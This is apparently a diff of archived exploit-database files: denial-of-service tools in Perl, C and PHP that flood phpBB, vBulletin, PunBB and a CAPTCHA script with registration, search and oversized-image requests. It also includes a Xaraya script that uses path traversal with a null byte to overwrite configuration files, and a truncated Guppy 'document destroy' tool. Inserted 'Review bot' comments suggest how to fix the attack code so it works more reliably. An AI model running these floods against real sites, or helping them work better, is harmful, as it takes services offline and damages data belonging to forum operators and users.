$postit = "$uname"."$umail"."%40neosecurityteam.net&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit";
## Posit Length
$lrg = length $postit;
## Connect Socket with Variables Provided By User
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock;
## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums
print $sock "POST $pth"."profile.php HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Connection: Keep-Alive\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);
## Print a "." for every loop
syswrite STDOUT, ".";
## Increment X in One for every Loop
$x++;
}
## If Type Is Equals To 2 or Search
}
elsif ($type == 2){
## User Search Loop for 9999 loops (enough for Flood xDDDD)
while($x != 9999)
{
## Final Search String to Send
$postit = "search_keywords=Neo+Security+Team+Proof+of+Concept+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";
## Posit Length
$lrg = length $postit;
## Connect Socket with Variables Provided By User
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock;
## Sending Truth Socket The HTTP Commands For Send A BD Search Into phpBB Forums
print $sock "POST $pth"."search.php?mode=results HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Connection: Keep-Alive\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);
## Print a "." for every loop
syswrite STDOUT, ".";
## Increment X in One for every Loop
$x++;
}
}else{
## STF??? What Do You Type
die "Option not Allowed O_o???\n";
}
# milw0rm.com [2005-06-22]
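Review bot: every header line is written with a bare `\n` (`print $sock "POST $pth"."profile.php HTTP/1.1\n";` and the lines that follow) and the header block ends with `\n\n`; HTTP/1.1 requires CRLF and some servers reject or mis-parse LF-only headers, so use `\r\n` throughout. `chop` strips the last character unconditionally, so input without a trailing newline, or with CRLF, is corrupted; use `chomp`. `Referer: $host` lacks a scheme, and since the script never reads a response, `Connection: Keep-Alive` does nothing; either read the reply (which also tells you whether the registration actually succeeded) or drop the header.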

248
platforms/php/dos/1064.c Executable file
@ -0,0 +1,248 @@
/*
--------------------------------------------------------
[N]eo [S]ecurity [T]eam [NST]® - Advisory #15 - 00/00/06
--------------------------------------------------------
Program: phpBB 2.0.15
Homepage: http://www.phpbb.com
Vulnerable Versions: phpBB 2.0.15 & Lower versions
Risk: High Risk!!
Impact: Multiple DoS Vulnerabilities.
-==phpBB 2.0.15 Multiple DoS Vulnerabilities ==-
---------------------------------------------------------
- Description
---------------------------------------------------------
phpBB is a high powered, fully scalable, and highly customizable
Open Source bulletin board package. phpBB has a user-friendly
interface, simple and straightforward administration panel, and
helpful FAQ. Based on the powerful PHP server language and your
choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers,
phpBB is the ideal free community solution for all web sites.
- Tested
---------------------------------------------------------
localhost & many forums
- Explotation
---------------------------------------------------------
profile.php << By registering as many users as you can.
search.php << by searching in a way that the db couln't observe it.
- Exploit
---------------------------------------------------------
[C Source]
/*
Name: NsT-phpBBDoS
Copyright: NeoSecurityteam
Author: HaCkZaTaN
Date: 19/06/05
Description: xD You must figure out the problem xD
root@NeoSecurity:/home/hackzatan# pico NsT-phpBBDoS.c
root@NeoSecurity:/home/hackzatan# gcc NsT-phpBBDoS.c -o NsT-phpBBDoS
root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS
[+] NsT-phpBBDoS v0.1 by HaCkZaTaN
[+] NeoSecurityTeam
[+] Dos has begun....[+]
[*] Use: ./NsT-phpBBDoS <path> <search.php or profile.php> <Host>
[*] Example: ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com
root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com
[+] NsT-phpBBDoS v0.1 by HaCkZaTaN
[+] NeoSecurityTeam
[+] Dos has begun....[+]
.................................
root@NeoSecurity:/home/hackzatan# echo "Let see how many users I have created"
root@NeoSecurity:/home/hackzatan# set | grep MACHTYPE
MACHTYPE=i486-slackware-linux-gnu
root@NeoSecurity:/home/hackzatan#
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#ifdef WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#pragma pack(1)
#define WIN32_LEAN_AND_MEAN
#else
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#endif
#define __USE_GNU
#define _XOPEN_SOURCE
int Connection(char *, int);
void Write_In(int , char *, char *a, char *, int);
char Use(char *);
int main(int argc, char *argv[])
{
int sock, x = 0;
char *Path = argv[1], *Pro_Sea = argv[2], *Host = argv[3];
puts("[+] NsT-phpBBDoS v0.1 by HaCkZaTaN");
puts("[+] NeoSecurityTeam");
puts("[+] Dos has begun....[+]\n");
fflush(stdout);
if(argc != 4) Use(argv[0]);
while(1)
{
sock = Connection(Host,80);
Write_In(sock, Path, Pro_Sea, Host, x);
#ifndef WIN32
shutdown(sock, SHUT_WR);
close(sock);
#else
closesocket(sock);
WSACleanup();
#endif
Pro_Sea = argv[2];
x++;
}
//I don't think that it will get here =)
return 0;
}
int Connection(char *Host, int Port)
{
#ifndef WIN32
#define SOCKET int
#else
int error;
WSADATA wsadata;
error = WSAStartup(MAKEWORD(2, 2), &wsadata);
if (error == SOCKET_ERROR)
{
perror("Could Not Start Up Winsock!\n");
return;
}
#endif
SOCKET sockfd;
struct sockaddr_in sin;
struct in_addr *myaddr;
struct hostent *h;
if(Port <= 0 || Port > 65535)
{
puts("[-] Invalid Port Number\n");
fflush(stdout);
exit(-1);
}
if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
{
perror("socket() ");
fflush (stdout);
exit(-1);
}
if(isalpha(Host[0]))
{
if((h = gethostbyname(Host)) == NULL)
{
perror("gethostbyname() ");
fflush (stdout);
exit(-1);
}
}
else
{
myaddr=(struct in_addr*)malloc(sizeof(struct in_addr));
myaddr->s_addr=inet_addr(Host);
if((h = gethostbyaddr((char *) &myaddr, sizeof(myaddr), AF_INET)) != NULL)
{
perror("gethostbyaddr() ");
fflush (stdout);
exit(-1);
}
}
memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_port = htons(Port);
memcpy(&sin.sin_addr.s_addr, h->h_addr_list[0], h->h_length);
if(connect(sockfd, (struct sockaddr *)&sin, sizeof(struct sockaddr_in)) < 0)
{
perror("connect() ");
exit (-1);
}
return sockfd;
}
void Write_In(int sock, char *Path, char *Pro_Sea, char *Host, int x)
{
char *str1 = (char *)malloc(4*BUFSIZ), *str2 = (char *)malloc(4*BUFSIZ);
char *req0 = "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\r\n"
"Accept: */*\r\n"
"Accept-Language: en-us\r\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
"Accept encoding: gzip,deflate\r\n"
"Keep-Alive: 300\r\n"
"Proxy-Connection: keep-alive\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Cache-Control: no-cache\r\n"
"Pragma: no-cache\r\n";
char *Profile = "%40neosecurityteam.net&new_password=0123456&password_confirm=0123456&icq=&aim=&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=1&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit\r\n";
char *Search = "&search_terms=any&search_author=*&search_forum=-1&search_time=0&search_fields=all&search_cat=-1&sort_by=0&sort_dir=DESC&show_results=topics&return_chars=200\r\n";
if(strcmp("profile.php", Pro_Sea) == 0) sprintf(str1, "username=NsT__%d&email=NsT__%d%s", x, x, Profile);
else if(strcmp("search.php", Pro_Sea) == 0)
{
Pro_Sea = "search.php?mode=results";
sprintf(str1, "search_keywords=Hack%d%s", x, Search);
}
else
{
puts("Sorry. Try making the right choice");
exit(-1);
}
sprintf(str2, "POST %s%s HTTP/1.1\r\n"
"Host: %s\r\n"
"Referer: http://%s/\r\n%s"
"Content-Length: %d\r\n\r\n%s", Path, Pro_Sea, Host, Host, req0, strlen(str1), str1);
write(sock, str2, strlen(str2));
write(1, ".", 1);
fflush(stdout);
}
char Use(char *program)
{
fprintf(stderr,"[*] Use: %s <path> <search.php or profile.php> <Host>\n", program);
fprintf(stderr,"[*] Example: %s /phpBB/ profile.php Victimshost.com\n", program);
fflush(stdout);
exit(-1);
}
/*
@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
'@@@@@''@@'@@@''''''''@@''@@@''@@
'@@'@@@@@@''@@@@@@@@@'''''@@@
'@@'''@@@@'''''''''@@@''''@@@
@@@@''''@@'@@@@@@@@@@''''@@@@@
*/
// milw0rm.com [2005-06-22]
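Review bot: the numeric-host branch of Connection() is broken: `gethostbyaddr((char *) &myaddr, sizeof(myaddr), AF_INET)` passes the address of the pointer and the pointer's size instead of `myaddr` and `sizeof(struct in_addr)`, and the `!= NULL` test is inverted, so a successful reverse lookup exits with an error while a failed one falls through to `h->h_addr_list[0]` with h NULL. The simple fix is to skip the reverse lookup and copy `myaddr->s_addr` into `sin.sin_addr` whenever `inet_addr()` succeeds. Also: isalpha() is used without <ctype.h>; `Use()` is declared `char` but never returns, and the Windows error path in Connection() does a bare `return;` from an int function; the request header `Accept encoding:` is missing its hyphen. The advisory banner still reads `00/00/06` while the code comment says `19/06/05`; fix the date.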

27
platforms/php/dos/11397.txt Executable file
@ -0,0 +1,27 @@
# Exploit Title: CaptchaSecurityImages.php Denial Of Service
# Author: cp77fk4r | empty0page[SHIFT+2]gmail.com | www.DigitalWhisper.co.il
# Software Link: http://www.white-hat-web-design.co.uk/articles/php-captcha.php
#
##[Denial Of Service]
(OWASP: The Denial of Service (DoS) attack is focused on making unavailable a resource (site, application, server) for the purpose it was designed. There are many ways to make a service unavailable for legitimate users by manipulating network packets, programming, logical, or resources handling vulnerabilities, among others. If a service receives a very large number of requests, it may stop providing service to legitimate users. In the same way, a service may stop if a programming vulnerability is exploited, or the way the service handles resources used by it.)
#
#Exploit:
/CaptchaSecurityImages.php?width=13333337&height=13333337&characters=13333337
#
#
The vuln code is: (lines 73-75)
#
$width = isset($_GET['width']) ? $_GET['width'] : '120';
$height = isset($_GET['height']) ? $_GET['height'] : '40';
$characters = isset($_GET['characters']) && $_GET['characters'] > 1 ? $_GET['characters'] : '6';
#
To fix it- delete all the "$_GET[x]" strings and make it constant, like this:
#
$width=100;
$height=40;
$characters=5;
#
#
#[e0f]
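Review bot: the proposed fix (`$width=100;` and friends) removes the feature rather than bounding it; the smaller change keeps the parameters but casts and clamps them, e.g. `$width = min(max((int)$_GET['width'], 50), 400);` with similar bounds for height and characters, so `width=13333337&height=13333337&characters=13333337` can no longer ask imagecreate() for a 13333337x13333337 canvas or loop 13333337 times drawing characters. The write-up should also name the resource being exhausted (memory and CPU per request, bounded only by memory_limit) and give the script's version or date, since the `lines 73-75` reference will drift.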

44
platforms/php/dos/12186.pl Executable file
@ -0,0 +1,44 @@
# DOS Vbulletin 92% Works ;)
#
# Tested on all versions! and can DOS the server
#
#Perl Script
use Socket;
if (@ARGV < 2) { &usage }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg;
for ($i=0; $i<10; $i--)
{
$user="vb".$rand.$i;
$data = "s="
;
$len = length $data;
$foo = "POST ".$dir."index.php HTTP/1.1\r\n".
"Accept: */*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "+" ;
}
print "\n\n";
system('ping $host');
sub usage {
print "\tusage: \n";
print "\t$0 <host> </dir/>\n";
print "\tex: $0 127.0.0.1 /forum/\n";
print "\tex2: $0 127.0.0.1 /\n\n";
exit();
};
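Review bot: `for ($i=0; $i<10; $i--)` decrements, so the loop never ends and the `system('ping $host')` line is unreachable (and inside single quotes it would not interpolate `$host` anyway); if an endless flood is intended, say so in the header and drop the dead code, otherwise write `$i++`. `$rand` and `$user` are computed but never used, and the body is just `s=`, a POST to index.php with an empty session id, so nothing here is vBulletin-specific; the "Tested on all versions" claim needs to say what in vBulletin makes this request expensive. `connect(...) || redo` restarts the iteration without any delay, so a refused connection becomes a tight spin.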

211
platforms/php/dos/1345.php Executable file
@ -0,0 +1,211 @@
<?php
# ---Xaraya_DOS.php 17.30 28/11/2005 #
# #
# Xaraya <=1.0.0 RC4 D.O.S #
# coded by rgod #
# site: http://rgod.altervista.org #
# #
# usage: launch from Apache, fill in requested fields, then go! #
# #
# Sun-Tzu: "Hold out baits to entice the enemy. Feign disorder, #
# and crush him." #
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
echo'<html><head><title> ******** Xaraya <=1.0.0 rc4 Denial of Service *********
</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css"> body {background-color:#111111; SCROLLBAR-ARROW-COLOR:
#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
{background-color: #FFFFFF !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !important} option
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
{background-color: #303030 !important} select {font-weight: normal; color:
#1CB081; background-color: #303030;} body {font-size: 8pt !important;
background-color: #111111; body * {font-size: 8pt !important} h1 {font-size:
0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em
!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6">
********** Xaraya <=1.0.0 rc4 Denial of Service ******** </p><p class="Stile6">a
script by rgod at <a href="http://rgod.altervista.org"target="_blank">
http://rgod.altervista.org</a></p><table width="84%"><tr><td width="43%"> <form
name="form1" method="post" action="'.strip_tags($SERVER[PHP_SELF]).'"><p><input
type="text" name="host"> <span class="Stile5">* hostname (ex:www.sitename.com)
</span></p> <p><input type="text" name="path"> <span class="Stile5">* path (ex:
/xaraya/ or just / ) </span></p></p><p> <input type="text" name="port"> <span
class="Stile5">specify a port other than 80 ( default value ) </span> </p>
<p> <input type="text" name="proxy"><span class="Stile5"> send exploit
through an HTTP proxy (ip:port)</span></p><p><input type="submit" name="Submit"
value="go!"></p></form> </td></tr></table></body></html>';
function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td>&nbsp;&nbsp;</td>";
for ($li=0; $li<=15; $li++)
{ echo "<td>".$headeri[$li+$ki]."</td>";
}
$ki=$ki+16;
echo "</tr><tr>";
}
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
{ echo "<td>&nbsp&nbsp</td>";
}
for ($li=$ci*16; $li<=strlen($headeri); $li++)
{ echo "<td>".$headeri[$li]."</td>";
}
echo "</tr></table>";
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacket() //if you have sockets module loaded, 2x speed! if not,load
//next function to send packets
{
global $proxy, $host, $port, $packet, $html, $proxy_regex;
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";
}
else
{ $c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid prozy...';
die;
}
echo "OK.<br>";
echo "Attempting to connect to ".$host." on port ".$port."...<br>";
if ($proxy=='')
{
$result = socket_connect($socket, $host, $port);
}
else
{
$parts =explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$result = socket_connect($socket, $parts[0],$parts[1]);
}
if ($result < 0) {
echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";
}
else
{
echo "OK.<br><br>";
$html= '';
socket_write($socket, $packet, strlen($packet));
echo "Reading response:<br>";
while ($out= socket_read($socket, 2048)) {$html.=$out;}
echo nl2br(htmlentities($html));
echo "Closing socket...";
socket_close($socket);
}
}
}
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='')
{$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) { echo 'No response from '.htmlentities($host);
die; }
}
else
{
$c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid prozy...';
die;
}
$parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) { echo 'No response from proxy...';
die;
}
}
fputs($ock,$packet);
if ($proxy=='')
{
$html='';
while (!feof($ock))
{
$html.=fgets($ock);
}
}
else
{
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
{
$html.=fread($ock,1);
}
}
fclose($ock);
echo nl2br(htmlentities($html));
}
$host=$_POST[host];$path=$_POST[path];
$port=$_POST[port];$proxy=$_POST[proxy];
if (($host<>'') and ($path<>''))
{
$port=intval(trim($port));
if ($port=='') {$port=80;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$host=str_replace("\r\n","",$host);
$path=str_replace("\r\n","",$path);
$KEYFILE=urlencode("../../../../.key.php"); //to create an empty key.php dir...
$HTACCESS=urlencode("../../../../../.htaccess"); //to create an empty .htaccess dir...
$CONFIGFILE=urlencode("../../../../config.system.php".CHR(0x00)); //overwrite configuration file with garbage
$request[0]="index.php?module=".$KEYFILE;
$request[1]="index.php?module=".$HTACCESS;
$request[2]="index.php?module=".$CONFIGFILE;
$request[3]="index.php";
for($i=0; $i<=count($request)-1; $i++)
{
$packet="GET ".$p.$request[$i]." HTTP/1.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="User-Agent: Zoo Tycoon 2 Client\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
}
if (eregi('fatal error',$html)) {echo "Exploit succeeded...";}
else {echo "Exploit failed...";}
}
else
{echo "Fill * required fields, optionally specify a proxy";}
?>
# milw0rm.com [2005-11-29]
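Review bot: `sendpacket()` validates `$proxy` against `$proxy_regex` before it ever checks whether `$proxy` is empty, so the no-proxy path of that function would always die with 'Not a valid prozy...'; since the request loop only calls `sendpacketii()`, the function is dead code and should either be removed or have the empty-string check moved ahead of the regex (and the typo fixed). The form action also references `$SERVER[PHP_SELF]` instead of `$_SERVER['PHP_SELF']`, an undefined variable, so the rendered action is empty and the form only works because an empty action posts back to the same URL.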

platforms/php/dos/1517.c Executable file

@ -0,0 +1,176 @@
/*
Name: NST-Exploit Punbb 2.0.10 Denial Of Service
Copyright: NeoSecurity
Author: K4P0
[./]NST-XplPunbb www.victim.com 2.0.0.6 /punbb/
#################################################
PunBB 2.0.10 Denial of Service exploit by K4P0
Use only at your own reputation risk! ;)
www.NeoSecurityTeam.net
#################################################
[1] - Trying if connection is possible...
[2] - Connected!
[3] - Flooding localhost...
Use it at your own risk!.
*/
#define WINDOWS
//#define LINUX
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef WINDOWS
#include <winsock2.h>
#include <windows.h>
// Link to (lib)ws2_32.a
#else
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#endif
#define NST_ALIVE 1
int Connect(char*);
void SendPack(int, int, char*, char*);
void _perror(char*);
void HowTo(char*);
int main(int argc, char* argv[])
{
int vict_sock, dos = 0;
puts("#################################################");
puts(" PunBB 2.0.10 Denial of Service exploit by K4P0 ");
puts(" Use only at your own reputation risk! ;) \n");
puts(" www.NeoSecurityTeam.net ");
if(argc < 4) HowTo(argv[0]);
puts("#################################################\n");
printf("[1] - Trying if connection is possible...\n", argv[1]);
fflush(stdout);
vict_sock = Connect(argv[2]);
printf("[2] - Connected!\n");
printf("[3] - Flooding %s", argv[1]);
#ifdef WINDOWS
closesocket(vict_sock);
#else
close(vict_sock);
#endif
while(NST_ALIVE)
{
if(!(dos % 10)) fprintf(stderr, ".");
vict_sock = Connect(argv[2]);
SendPack(vict_sock, dos, argv[3], argv[1]);
dos++;
#ifdef WINDOWS
closesocket(vict_sock);
WSACleanup();
#else
close(vict_sock);
#endif
}
return 0;
}
// I'm to lazy to use gethostby(addr|name) :)
int Connect(char* IP)
{
struct sockaddr_in *_addr;
int vict_sck;
#ifdef WINDOWS
WSADATA wsaData;
if(WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
{
//WSAGetLastError()? Nah...
fprintf(stderr, "[*] WSAStartup() failed");
exit(-1);
}
#endif
if(!(_addr=(struct sockaddr_in *)malloc(sizeof(struct sockaddr_in))))
{
fprintf(stderr, "[*] Unable to reserve memory");
exit(-1);
}
memset(_addr, 0x0, sizeof(struct sockaddr_in));
_addr->sin_family = AF_INET;
_addr->sin_port = htons(80);
_addr->sin_addr.s_addr = inet_addr(IP);
#ifdef WINDOWS
if((vict_sck = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0)) < 0)
{
fprintf(stderr, "WSASocket() failed");
exit(-1);
}
else
if((vict_sck = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
_perror("socket() ");
#endif
if(connect(vict_sck, (struct sockaddr *)_addr, sizeof(struct sockaddr)) < 0)
_perror("connect() ");
free(_addr);
return vict_sck;
}
void SendPack(int v_sck, int var, char* path, char* DNS)
{
char *HTTP_PACK, *HTTP_MPCK, *HTTP_POST;
if(!(HTTP_PACK = (char *)malloc(2048)) || !(HTTP_MPCK = (char *)malloc(1024)) ||
!(HTTP_POST = (char *)malloc(512)))
{
fprintf(stderr, "Error trying to reserver memory");
exit(-1);
}
sprintf(HTTP_PACK, "POST %sregister.php?action=register HTTP/1.1\n"
"Host: %s\n"
"User-Agent: Mozilla/5.0 Gecko/20050511 Firefox/1.0.4\n"
"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n"
"Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n"
"Keep-Alive: 300\n"
"Proxy-Connection: keep-alive\n"
"Referer: http://%s%sregister.php\n"
"Content-Type: application/x-www-form-urlencoded\n", path, DNS, DNS, path);
sprintf(HTTP_POST, "form_sent=1&req_username=%d__NsT&req_password1=flood&req_password2=flood&"
"req_email1=%d_peace@NsT.net&timezone=-10&email_setting=1", var, var);
sprintf(HTTP_MPCK, "Content-Length: %d\n\n", strlen(HTTP_POST));
strcat(HTTP_PACK, HTTP_MPCK);
strcat(HTTP_PACK, HTTP_POST);
send(v_sck, HTTP_PACK, strlen(HTTP_PACK), 0);
free(HTTP_PACK);
free(HTTP_MPCK);
free(HTTP_POST);
return;
}
void _perror(char* msg)
{
perror(msg);
fflush(stdout);
exit(-1);
}
void HowTo(char* program)
{
fprintf(stderr, "%s <DNS> <IP> <Path>\n", program);
fprintf(stderr, "f.e: ./NsT-XplPunbb www.victim.com 2.0.0.6 /punbb/\n");
fprintf(stderr, "#################################################");
exit(0);
}
// milw0rm.com [2006-02-20]
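Review bot: the `#ifdef WINDOWS` block in `Connect()` has no `#else` between the `WSASocket()` branch and the `socket()` call, so the non-Windows build suggested by the commented-out `#define LINUX` never creates a socket and `connect()` runs on an uninitialized `vict_sck`; on Windows the trailing `else` overwrites the handle returned by a successful `WSASocket()` with a second `socket()`, leaking the first. Either restore the `#else` or document the file as Windows-only. The first `printf()` in `main()` also passes `argv[1]` with no matching conversion in its format string, which `-Wformat` flags.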

platforms/php/dos/1573.php Executable file

@ -0,0 +1,232 @@
# Change line 30 s/htp/http if you would like to see the logo. /str0ke
<?php
# Guppy <= 4.5.11 Remote DOS Exploit #
# by trueend5 #
# Computer Security Science Researchers Institute #
# [http://www.KAPDA.ir] #
# #
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 5);
ob_implicit_flush (1);
echo'<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Guppy &lt;= 4.5.11 Remote DOS Exploit</title>
</head>
<body bgcolor="#FFCCFF">
<p align="center"><font size="4" color="#0000FF">Guppy &lt;= 4.5.11 Remote DOS
Exploit</font></p>
<p class="Stile6" align="center"><font size="3" color="#FF0000">by trueend5</font></p>
<p align="center"><font size="4" color="#008000">Computer Security Science Researchers
Institute</font></p>
<font SIZE="3">
<p align="center"><a href="http://www.kapda.ir">KAPDA</a></p>
<p align="center"><img border="0" src="http://irannetjob.com/pics/ph-logo.png" width="120" height="121"></p>
</font>
<table width="90%">
<tbody>
<tr>
<td width="43%" align="left">
<form name="form1" action="'.$SERVER[PHP_SELF].'" method="post">
<p><input name="host" size="20"> <span class="Stile5"><font color="#FF0000">*</font> hostname (ex:www.sitename.com)</span></p>
<p><input name="path" size="20"> <span class="Stile5"><font color="#FF0000">*</font> path (ex:
/guppy/
or just / )</span></p>
<p><input name="num" size="20"> <span class="Stile5">how many document
do you want to destroy (default is 100)</span></p>
<p>&nbsp; This option works when magic_quotes_gpc is Off</p>
<p><input name="port" size="20"><span class="Stile5">specify a port&nbsp;
(default is 80)</span></p>
<p><input name="proxy" size="20"><span class="Stile5">send exploit
through an HTTP proxy (ip:port)</span></p>
<p align="center"> <span class="Stile5"><font color="#FF0000">&nbsp;&nbsp;
* </font>fields are required</span></p>
<p align="center"><span class="Stile5">-----------------------------------------------------------------------------------------------</span></p>
<p><input type="submit" value="Start" name="Submit"></p>
</form>
</td>
</tr>
</tbody>
</table>
</body></html>';
function show($headeri)
{
$ii=0;$ji=0;$ki=0;$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1){
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td>&nbsp;&nbsp;</td>";
for ($li=0; $li<=15; $li++) {
echo "<td>".$headeri[$li+$ki]."</td>";
}
$ki=$ki+16;
echo "</tr><tr>";
}
if (strlen($datai)==1) {
echo "<td>0".$datai."</td>";
}
else {
echo "<td>".$datai."</td> ";
}
$ii++;$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) {
echo "<td>&nbsp&nbsp</td>";
}
for ($li=$ci*16; $li<=strlen($headeri); $li++) {
echo "<td>".$headeri[$li]."</td>";
}
echo "</tr></table>";
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacket()
{
